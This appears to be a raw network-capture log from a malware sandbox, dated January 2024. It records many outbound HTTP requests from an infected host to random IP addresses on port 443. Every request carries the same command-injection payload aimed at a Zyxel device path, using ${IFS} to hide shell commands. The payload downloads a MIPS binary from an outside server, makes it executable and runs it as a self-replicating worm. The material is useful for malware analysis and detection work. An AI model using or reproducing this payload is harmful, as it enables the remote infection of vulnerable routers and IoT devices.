                                                        Jan 28, 2024 10:12:59.540522099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6216192.168.2.1450158194.33.7.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540549994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6217192.168.2.143529825.236.152.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540597916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6218192.168.2.145856443.93.100.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540631056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6219192.168.2.1433830192.45.252.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540674925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6220192.168.2.1434982222.109.165.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540697098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6221192.168.2.1458502182.161.46.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540754080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6222192.168.2.145543845.197.33.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540810108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6223192.168.2.1440022131.28.161.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540831089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6224192.168.2.1436874186.181.214.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540880919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6225192.168.2.1444198166.51.217.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540910959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6226192.168.2.144474292.254.57.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540960073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6227192.168.2.1437668160.168.86.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540992975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6228192.168.2.1450610117.210.53.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.541018009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6229192.168.2.143819225.137.185.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544068098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6230192.168.2.1434086112.196.37.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544604063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6231192.168.2.143569075.76.3.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544646025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6232192.168.2.1456796179.167.209.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544707060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6233192.168.2.144983083.117.37.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544754982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6234192.168.2.1444132165.29.207.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544795990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6235192.168.2.144159687.250.4.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544826031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6236192.168.2.1452144180.135.183.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544867992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6237192.168.2.1450902171.168.42.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544902086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6238192.168.2.145342689.227.118.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.544961929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6239192.168.2.1445000112.206.44.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.545011997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6240192.168.2.1451312165.172.137.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.545049906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6241192.168.2.144329099.62.118.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.545064926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6242192.168.2.1449468103.8.171.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.545119047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6243192.168.2.144289840.187.25.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.545140982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6244192.168.2.145923253.197.137.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553236961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6245192.168.2.145216624.177.72.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553275108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6246192.168.2.1432978149.201.213.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553306103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6247192.168.2.1452622223.179.82.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553358078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6248192.168.2.1441498140.66.53.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553390980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6249192.168.2.1452350197.190.34.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553436995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6250192.168.2.145803285.7.112.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553468943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6251192.168.2.1454994136.196.132.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553519011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6252192.168.2.1439460209.99.194.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553563118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6253192.168.2.1443204198.195.134.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553591013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6254192.168.2.1451400139.204.180.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553658962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6255192.168.2.145492835.67.66.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553683996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6256192.168.2.144668817.223.92.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553741932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6257192.168.2.1456472117.194.81.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553785086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6258192.168.2.143435076.30.62.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553818941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6259192.168.2.144570225.16.246.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553850889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6260192.168.2.1443056138.145.134.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553904057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6261192.168.2.1454704198.232.240.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553930998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6262192.168.2.1451404130.81.36.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553970098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6263192.168.2.143977831.34.38.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.553989887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6264192.168.2.145305665.20.184.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554027081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6265192.168.2.145500493.137.215.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554059029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6266192.168.2.144168043.186.129.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554102898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6267192.168.2.1439364196.251.137.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554141998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6268192.168.2.145561067.47.180.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554178953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6269192.168.2.1451036210.179.161.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554215908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6270192.168.2.14356708.21.173.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554253101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6271192.168.2.1456520101.217.38.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554281950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6272192.168.2.144643240.9.76.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554316998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6273192.168.2.144775451.209.155.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554343939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6274192.168.2.1456914190.138.140.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554361105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6275192.168.2.1444450123.133.123.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:00.554409981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6276192.168.2.143942265.223.210.158443
                                                        TimestampBytes transferredDirectionData
